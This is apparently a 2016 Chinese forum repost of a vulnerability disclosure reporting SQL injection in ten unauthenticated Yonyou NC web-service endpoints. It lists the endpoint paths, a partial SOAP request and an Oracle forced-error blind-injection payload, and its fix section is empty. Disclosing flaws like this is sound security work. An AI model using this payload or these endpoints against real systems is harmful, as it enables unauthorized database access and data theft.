HanDs
NO.2

[7月漏洞公开] 用友某系统多处注入漏洞打包 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

wooyun搜了一下,没有人提,来一发。

详细说明:

首先,该接口是无需权限访问的。

已http://**.**.**.**/bugs/wooyun-2010-0178322为例:

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvbasdocExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IMeasdocExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvclExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IAreaclExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerImportToNcService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICorpExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IPsndocExportToCrmService?wsdl

**.**.**.**:8080/uapws/service/nc.itf.bd.crm.IUserExportToCrmService?wsdl

均存在注入

04184.png

04185.png



无法报错注入的,因为我们填充的数据是随意填充的,也没有办法盲注,可以使用dns查询的方式。

code 区域
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService
<soapenv:Envelope xmlns:soapenv="http://**.**.**.**/soap/envelope/" xmlns:icur="http://crm.bd.itf.nc/ICurrtypeExportToCrmService">
<soapenv:Header/>
<soapenv:Body>
<icur:exportCurrtypeToCrm>



04186.png



还有一种情况是无法报错注入,也不能盲注,延时也不可以,可以使用强制报错盲注的办法:

'and 1=(SELECT (CASE WHEN (length((select SYS_CONTEXT('USERENV','DB_NAME') from dual))=4) THEN 1 ELSE CAST('a' AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)-- 来猜解数据。





漏洞证明:

http://**.**.**.**:9090/

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
用友 系统 注入 漏洞 打包
#1楼
发帖时间:2016-7-19   |   查看数:0   |   回复数:0
游客组